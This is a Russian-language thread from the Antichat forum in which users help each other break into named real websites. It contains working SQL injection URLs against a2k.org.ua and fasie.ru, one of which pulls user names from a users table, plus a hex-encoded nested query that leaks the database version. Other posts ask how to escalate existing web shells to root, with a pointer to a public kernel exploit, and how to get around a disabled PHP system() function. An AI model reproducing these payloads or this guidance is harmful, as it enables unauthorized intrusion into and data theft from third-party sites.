ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
21.04.2008, 07:56
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
просто я от ссылки Велемир-а отталкивался.
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=ru
сравни эти две ссылки поменял токо окончание с en на ru.
после /* опускаются как ты сказал, все в запросе mysql. но не как не все параметры GET. |
|
|
21.04.2008, 11:40
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.
|
|
|
|
21.04.2008, 16:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Гы)))) Ну без мата не могуЮ такая моя пошлая натура сложилась :Р(.Мя позабавило то, что там обрезается длина вывода ))).Субстринг решает  |
|
|
|
21.04.2008, 18:05
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Сообщение от Ershik
Каким скриптом на php или perl можно воспользоваться, чтобы выяснить серверные пути.
Например /var/vadim/www/ и /var/orlusha/ чтобы выводился список каталогов.
аля пхп вроде так)
<?
system(pwd);
?>
ну или system(dir) если винда, вроде так)
Последний раз редактировалось Grema; 21.04.2008 в 18:12..
|
|
|
|
21.04.2008, 19:20
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Привет всем
Помогите пожалуйста разобраться,,, вот есть сайт:
www.fasie.ru/index.php?rid=120'
Немогу понять что нужно дальше делать 
Если я не ошибаюсь нужно вводить:
Код HTML:
www.fasie.ru/index.php?rid=-120+union+select+null,null,null*/
Но ошибки всё вылезают и вылезают:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 63
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/content.inc.php on line 185
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/fasie/www/htdocs/lib/classes.inc.php on line 138
Пробовал делать так:
Код HTML:
www.fasie.ru/index.php?rid=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ((и тд.....))*/
Теже ошибки......нужно до бесконечности перебирать эти значения ???
Помогите пожалуйста |
|
|
|
21.04.2008, 20:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..
|
|
|
|
21.04.2008, 23:14
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме:
4789789
Репутация:
71
|
|
Поднятие прав
Имеются 2 шелла, нужно поднять права до рута
1) uid=48(apache) gid=48(apache) groups=48(apache),100(users)
Linux zeus 2.6.18-8.1.4.el5 #1 SMP Thu May 17 03:26:03 EDT 2007 i686 i686 i386 GNU/Linux
2) uid=768443(site) gid=203435(pg587717) groups=203435(pg587717)
Linux nerds 2.4.32-grsec+f6b+gr217+nfs+a32+fuse23+tg+++opt+c8+gr2b-v6.194 #1 SMP Tue Jun 6 15:52:09 PDT 2006 i686 GNU/Linux
Help.
|
|
|
|
21.04.2008, 23:19
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
TheSoul 2ое врядли, во первых gr secured, во вторых однно из последних 2.;.* ветки
а первое сопкойно рутается http://milw0rm.com/exploits/5092
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
22.04.2008, 06:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 159932
там www.fasie.ru/index.php?rid=-120+union+select+1/*
только вывода я не нашёл .. сайт оч плохо грузится ..
вывод есть как я понял только если использовать двойной запрос, т.е. внутри этого запроса использовать еще один запрос, все неудобство в том, что кавычки экранируются, и приходится этот второй запрос переводить в hex вобщем вот:
Код:
http://www.fasie.ru/index.php?rid=120+union+select+0x2D3120756E696F6E2073656C65637420312C322C76657273696F6E28292C342C352C362C372C382C392C31302C31312C3132+limit+1,1/*
видим в заголовке страницы версию
фактически запрос выглядит так:
Код:
120 union select '-1 union select 1,2,version(),4,5,6,7,8,9,10,11,12' limit 1,1/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.04.2008, 10:34
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Сообщение от Grema
аля пхп вроде так)
<?
system(pwd);
?>
ну или system(dir) если винда, вроде так)
Warning: system() has been disabled for security reasons in /usr/home/sait/pwd.php on line 2
Функция зпрещена. Можно это обойти?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
